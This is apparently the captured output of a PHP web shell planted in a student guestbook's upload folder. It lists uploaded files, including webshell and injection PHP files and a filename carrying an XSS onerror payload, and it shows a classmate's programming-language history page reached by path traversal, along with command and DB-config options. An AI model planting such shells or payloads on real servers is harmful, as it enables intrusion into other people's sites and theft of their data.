🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ./../../../../587109.klas4s23.mid-ica.nl/public_html/Technowire/decoding-history.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="images/logo-technowire.png">
    <link rel="stylesheet" href="technowire-general.css">
    <link href="https://fonts.cdnfonts.com/css/agency-fb" rel="stylesheet">
    <title>Silicon Valley</title>
</head>

<body>
    <div class="container-default">
        <div class="header">
            <div class="container-child">
                <div class="header-left">
                    <img id="main-header-img" src="images/technowire_logo_white.png" alt="Main Logo">
                </div>
                <div class="header-right">
                    <a href="index.html"><button class="home-button"><img id="home-button"
                                src="images/home-white.png"></button></a>

                                <input id="menu-toggle" type="checkbox" />
                                <label class='menu-button-container' for="menu-toggle">
                                <div class='menu-button'></div>
                            </label>
                            <ul class="menu">
                                <li><a href="hall-off-fame.html">Hall Of Fame</a></li>
                                <li><a href="decoding-history.html">Decoding History</a></li>
                                <li><a href="silicon-valley.html">Silicon Valley</a></li>
                                <li><a href="index.html">Home</a></li>
                            </ul>
                            </section>
                </div>
            </div>
        </div>
        <div class="nav">
            <div class="sidenav">
                <br>
                <a href="hall-off-fame.html"> IT Hall Of Fame</a>
                <br>
                <a href="decoding-history.html"> Decoding History</a>
                <br>
                <a href="silicon-valley.html"> Silicon Valley</a>
            </div>
        </div>
        <div class="timeline">
            <div class="bg-gradient_solid">
                <div class="container">
                    <div class="section-header">
                        <h2>The development of programming languages (0 to now):</h2>
                        <p>Introduction
                            Programming languages can be divided into different categories. These categories provide
                            software developers with different levels of abstraction and capabilities to develop
                            software solutions. Machine code consists of instructions executed and understood by a
                            computer processor. The code is composed of binary digits indicating actions and operations
                            the processor performs. Assembly languages are programming languages that provide a low
                            level of abstraction between machine code and higher-level programming languages. Assembly
                            languages use text symbols and abbreviations. Higher-level programming languages are
                            designed to allow programmers to write code at a more abstract level. An example of a
                            higher-level programming language is Javascript. Fourth-generation languages, also known as
                            4GL, are programming languages designed to facilitate the development of software
                            applications through higher levels of abstraction and automation. An example of a 4GL
                            language is SQL. Object-oriented languages, also known as OOP languages, are programming
                            languages that make it easier to design and maintain complex systems. An example of an
                            object-oriented language is Python.
                        </p>
                        <hr>
                    </div>
                    <div class="steps">
                        <div class="steps-container">
                            <div class="content">
                                <div class="text-content">
                                    <h2>C++ |  Bjarne Stroustrup</h2>
                                    <br>
                                    <p>C++ is a programming language used to build a wide range of software, from games and
                                    applications to system software. In simple terms, it's a tool that developers use to
                                    write code that can be executed by a computer. C++ is known for its efficiency and
                                    versatility, making it suitable for tasks that require high performance, such as
                                    game development, system programming, and creating software for various applications
                                    and industries.</p>
                                    <img id="images" src="images/c++.png">
                                </div>
                            </div>
                            <i class="step-line"></i>
                            <div class="date">1983</div>
                        </div>
                        <div class="steps-container">
                            <div class="content">
                                <div class="text-content">
                                    <h2>Python  |   Guido van Rossum</h2>
                                        <p>Python is a programming language used for various applications, from web development
                                        to data analysis. In simple terms, it's a versatile tool that allows developers to
                                        write code to solve different types of problems. Python is known for its readability
                                        and ease of use, making it a popular choice for beginners. It is used for tasks like
                                        building websites, creating automation scripts, developing software, and analyzing
                                        data in fields such as machine learning and scientific research.
                                        <img id="images" src="images/python.png">
                                    </p>
                                </div>
                            </div>
                            <i class="step-line"></i>
                            <div class="date">1991</div>
                        </div>
                        <div class="steps-container">
                            <div class="content">
                                <div class="text-content">
                                    <h2>HTML   |   Sir Tim Berners-Lee</h2>
                                    <p>
                                    HTML, or Hypertext Markup Language, is the standard language used to create and
                                    design websites. In simple terms, HTML is used to structure the content on web
                                    pages, defining elements like headings, paragraphs, images, links, and more. It
                                    provides the basic building blocks for creating web pages and is essential for
                                    displaying information on the internet in a structured and readable way.
                                    </p>
                                    <img id="images" src="images/html.png">
                                </div>                                
                            </div>
                            <i class="step-line"></i>
                            <div class="date">1993</div>
                        </div>
                        <div class="steps-container">
                            <div class="content">
                                <div class="text-content">
                                    <h2>Javascript  |   Brendan Eich</h2>
                                    <p>JavaScript is a programming language used for making websites interactive. In simple
                                    terms, it allows developers to create features like dynamic content, interactive
                                    forms, and responsive interfaces on web pages. JavaScript runs in web browsers and
                                    enhances the user experience by adding interactivity, making websites more engaging
                                    and functional.
                                    </p>
                                    <img id="images" src="images/javascript.png">
                                </div>
                            </div>
                            <i class="step-line"></i>
                            <div class="date">1995</div>
                        </div>
                        <div class="steps-container">
                            <div class="content">
                                <div class="text-content">
                                    <h2>PHP |   Rasmus Lerdorf<h2>
                                    <p>
                                    PHP is a server-side scripting language commonly used in web development to create
                                    dynamic websites. It enables developers to embed code within HTML for tasks like
                                    processing forms and interacting with databases. Widely used for various web
                                    applications, PHP enhances website functionality by processing data and generating
                                    dynamic content.
                                    </p>
                                    <img id="images" src="images/php.png">
                                </div>
                            </div>
                            <i class="step-line"></i>
                            <div class="date">1995</div>
                        </div>
                        <div class="steps-container">
                            <div class="content">
                                <div class="text-content">
                                    <h2>Java    |   James Gosling</h2>
                                    <p>Java is a versatile programming language used for creating applications that run on
                                    various devices. Known for its platform independence, it's widely used for web apps,
                                    mobile apps (especially Android), enterprise systems, and various software
                                    applications.
                                    </p>
                                    <img id="images" src="images/java.png">
                                </div>
                            </div>
                            <i class="step-line"></i>
                            <div class="date">1996</div>
                        </div>
                        <div class="steps-container">
                            <div class="content">
                                <div class="text-content">
                                    <h2>CSS |   HΓ₯kon Wium Lie and Bert Bos</h2>
                                    <p>CSS is a web development language that styles HTML elements, controlling how text,
                                    images, and layout appear on a website. It enables developers to define fonts,
                                    colors, spacing, and positioning for consistent and visually appealing designs. By
                                    separating structure (HTML) and presentation (CSS), it enhances code modularity and
                                    maintainability, ensuring a cohesive and pleasing user experience.
                                    </p>
                                    <img id="images" src="images/css.png">
                                </div>
                            </div>
                            <i class="step-line"></i>
                            <div class="date">1996</div>
                        </div>
                        <div class="steps-container">
                            <div class="content">
                                <div class="text-content">
                                    <h2>C#  |   Anders Hejlsberg</h2>
                                    <p>
                                    C# is a Microsoft-developed programming language used to build versatile software
                                    applications for Windows, web, and mobile platforms. It's part of the .NET framework
                                    and is popular for creating applications in the Microsoft ecosystem, including
                                    Windows apps, Unity games, and server-side applications. In essence, C# provides
                                    flexibility and compatibility for a diverse range of software.
                                    </p>
                                    <img id="images" src="images/csharp.png">
                                </div>
                            </div>
                            <i class="step-line"></i>
                            <div class="date">2001</div>
                        </div>
                        <div class="steps-container">
                            <div class="content">
                                <div class="text-content">
                                     <h2>Swift  |   Chris Lattner</h2>
                                    <p>Swift is Apple's programming language for building applications on iOS, macOS,
                                    watchOS, and tvOS. It's used to create software for Apple devices, from iPhones to
                                    Macs. Known for its speed, safety features, and modern syntax, Swift is popular for
                                    developing mobile apps, desktop software, and applications for wearables and smart
                                    TVs. In essence, Swift is a user-friendly tool tailored for Apple app development.
                                </p>
                                <img id="images" src="images/swift.png">
                                </div>
                            </div>
                            <i class="step-line"></i>
                            <div class="date">2014</div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!